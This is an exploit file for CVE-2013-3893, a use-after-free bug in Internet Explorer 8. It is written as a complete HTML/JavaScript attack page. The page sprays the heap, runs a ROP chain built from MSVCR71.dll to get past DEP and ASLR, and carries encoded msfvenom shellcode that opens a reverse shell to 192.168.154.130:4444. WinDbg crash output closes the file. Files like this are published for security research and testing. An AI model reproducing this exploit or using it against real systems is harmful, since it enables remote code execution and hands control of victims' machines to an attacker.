# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free # Date: 15/05/2021 # CVE : CVE-2013-3893 # PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json # Exploit Author: SlidingWindow # Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN # Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1) # Bypasses: DEP, ASLR using MSVCR71.DLL # Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training <html> <script> var spraychunks = new Array(); // Use BSTR spray since DEPS spray didn't work here function heapspray() { var ropchain = unescape("%u122c%u0c0c"); //EAX now points here. EDX = [EAX+0x70]. So call EDX will take a forward jump to stack-heap flip: 0x7c348b05 : # XCHG EAX,ESP # RETN //ESP points here after stack-heap flip. jump over padding+stack-heap flip into ROP chain. ropchain += unescape("%u6bd5%u7c36"); //0x7c366bd5 : # ADD ESP,100 # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //Some padding ropchain += unescape("%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565%u6262%u6262%u6363%u6363%u6464%u6464%u6565%u6565"); //ESP will point to 0x0c0c122c after stack-heap flip. ropchain += unescape("%u8b05%u7c34"); //0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll] ** | {PAGE_EXECUTE_READ} //More padding for ADD ESP, 100 ropchain += unescape("%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565%u6565"); //rop chain generated with mona.py - www.corelan.be //ropchain needed a little fix ropchain += unescape( "" + // #[---INFO:gadgets_to_set_ebp:---] : "%u1cab%u7c35" + // 0x7c351cab : ,# POP EBP # RETN [MSVCR71.dll] "%u1cab%u7c35" + // 0x7c351cab : ,# skip 4 bytes [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ebx:---] : "%u728e%u7c34" + // 0x7c34728e : ,# POP EAX # RETN [MSVCR71.dll] "%ufdff%uffff" + // 0xfffffdff : ,# Value to negate, will become 0x00000201 "%u684b%u7c36" + // 0x7c36684b : ,# NEG EAX # RETN [MSVCR71.dll] "%u1695%u7c37" + // 0x7c371695 : ,# POP EBX # RETN [MSVCR71.dll] "%uffff%uffff" + // 0xffffffff : ,# "%u5255%u7c34" + // 0x7c345255 : ,# INC EBX # FPATAN # RETN [MSVCR71.dll] "%u2174%u7c35" + // 0x7c352174 : ,# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edx:---] : "%u5937%u7c34" + // 0x7c345937 : ,# POP EDX # RETN [MSVCR71.dll] "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040 "%u1eb1%u7c35" + // 0x7c351eb1 : ,# NEG EDX # RETN [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_ecx:---] : "%u0c81%u7c36" + // 0x7c360c81 : ,# POP ECX # RETN [MSVCR71.dll] "%ucd8c%u7c38" + // 0x7c38cd8c : ,# &Writable location [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_edi:---] : "%u4648%u7c35" + // 0x7c354648 : ,# POP EDI # RETN [MSVCR71.dll] "%ud202%u7c34" + // 0x7c34d202 : ,# RETN (ROP NOP) [MSVCR71.dll] "" + // #[---INFO:gadgets_to_set_esi:---] : "%u50dd%u7c36" + // 0x7c3650dd : ,# POP ESI # RETN [MSVCR71.dll] "%u15a2%u7c34" + // 0x7c3415a2 : ,# JMP [EAX] [MSVCR71.dll] "%u5194%u7c34" + // 0x7c345194 : ,# POP EAX # RETN [MSVCR71.dll] // "%ua140%u7c37" + // 0x7c37a140 : ,# ptr to &VirtualProtect() [IAT MSVCR71.dll] // "%ua051%u7c37" + // 7c37a051 + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "%ua151%u7c37" + // 7c37a151 + + 0xEF should become 0x7c37a140, which is a pointer to &VirtualProtect() // Because next instruction adds 0xEF into AL. "" + // #[---INFO:pushad:---] : "%u8c81%u7c37" + // 0x7c378c81 : ,# PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] "" + // #[---INFO:extras:---] : "%u5c30%u7c34" + // 0x7c345c30 : ,# ptr to 'push esp # ret ' [MSVCR71.dll] ""); // : // msfvenom -p windows/shell_reverse_tcp -a x86 lhost=192.168.154.130 lport=4444 -b '\x00' -f js_le // First few bytes, %uc481%ufa24%uffff (which is \x81\xc4\x24\xfa\xff\xff # add esp,-1500) move ESP away from EIP to avoid GetPC() routine from corrupting our shellcode var shellcode = unescape("%uc481%ufa24%uffff%uccd9%u74d9%uf424%ube5d%uba98%ue3da%uc931%u52b1%u7531%u8317%u04c5%ued03%u38a9%uf116%u3e26%u09d9%u5fb7%uec53%u5f86%u6507%u6fb8%u2b43%u1b35%udf01%u69ce%ud08e%uc767%udfe8%u7478%u7ec8%u87fb%ua01d%u47c2%ua150%ub503%uf399%ub1dc%ue30c%u8f69%u888c%u0122%u6d95%u20f2%u20b4%u7a88%uc316%uf75d%udb1f%u3282%u50e9%uc870%ub0e8%u3148%ufd46%uc064%u3a96%u3b42%u32ed%uc6b0%u81f6%u1cca%u1172%ud66c%ufd24%u3b8c%u76b2%uf082%ud0b0%u0787%u6b14%u8cb3%ubb9b%ud635%u1fbf%u8c1d%u06de%u63fb%u58de%udca4%u137a%u0849%u7ef7%ufd06%u803a%u69d6%uf34c%u36e4%u9be6%ube44%u5c20%u95aa%uf295%u1655%udbe6%u4291%u73b6%ueb33%u835d%u3ebc%ud3f1%u9112%u83b2%u41d2%uc95b%ubedc%uf27b%ud736%u0916%u18d1%u8b4e%uf1a3%uab8d%u5db2%u4d1b%u4dde%uc64d%uf777%u9cd4%uf8e6%ud9c2%u7229%u1ee1%u73e7%u0c8c%u7390%u6edb%u8b37%u06f1%u1edb%ud69e%u0292%u8109%uf5f3%u4740%uacee%u75fa%u29f3%u3dc4%u8a28%ubccb%ub6bd%uaeef%u367b%u9ab4%u61d3%u7462%udb92%u2ec4%ub74c%ua68e%ufb09%ub010%ud615%u5ce6%u8fa7%u63be%u5808%u1c37%uf874%uf7b8%u083c%u55f3%u8114%u0c5a%ucc24%ufb5c%ue96b%u09de%u0e14%u78fe%u4a11%u91b8%uc36b%u952d%ue4d8%u4167"); var junk = unescape("%u2020%u2020"); while (junk.length < 0x4000) junk += junk; offset = 0x204/2 ; //0c0c1228 var junk_front = junk.substring(0,offset); var junk_end = junk.substring(0,0x800 - junk_front.length - ropchain.length - shellcode.length) var smallblock = junk_front + ropchain + shellcode + junk_end; var largeblock = ""; while (largeblock.length < 0x80000) { largeblock = largeblock + smallblock; } // make allocations for (i = 0; i < 0x450; i++) { spraychunks[i] = largeblock.substring(0, (0x7fb00-6)/2); } } function alloc(nr_alloc){ for (var i=0; i < nr_alloc; i++){ divobj = document.createElement('div'); // Allocate 0x25 (37 decimal) bytes. Vulnerable object size = 0x4c bytes divobj.className = "\u1228\u0c0c\u4141\u4141\u4242\u4242\u4343\u4343\u4444\u4444\u4545\u4545\u4646\u4646" + "\u4747\u4747\u4848\u4949\u4949\u5050\u5050\u5151\u5151\u5252\u5252\u5353\u5353\u5454" + "\u5454\u5555\u5555\u5656\u5656\u5757\u5757\u5858\u5858"; } } heapspray(); function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); heapspray(); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { //Vulnerable Object is freed here document.write(""); //Replace/Reclaim the freed object here. //Object size is 0x4c alloc(0x20); } id_0['outerText']=""; id_0.setCapture(); id_1.setCapture(); } window.onload = function() { trigger(); } </script> </html> <!-- Debug: Taking a different code path for this exploit First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000003 ebx=00000100 ecx=40404040 edx=00000001 esi=0089c098 edi=00000000 eip=7467b68d esp=0301c34c ebp=0301c360 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] ds:002b:40404040=???????? 0:005> u eip mshtml!CElement::Doc: 7467b68d 8b01 mov eax,dword ptr [ecx] 7467b68f 8b5070 mov edx,dword ptr [eax+70h] 7467b692 ffd2 call edx 7467b694 8b400c mov eax,dword ptr [eax+0Ch] 7467b697 c3 ret 7467b698 90 nop 7467b699 90 nop 7467b69a 90 nop 0:005> ub eip mshtml!CElement::SecurityContext+0x22: 7467b681 8b01 mov eax,dword ptr [ecx] 7467b683 8b5070 mov edx,dword ptr [eax+70h] 7467b686 ffe2 jmp edx 7467b688 90 nop 7467b689 90 nop 7467b68a 90 nop 7467b68b 90 nop 7467b68c 90 nop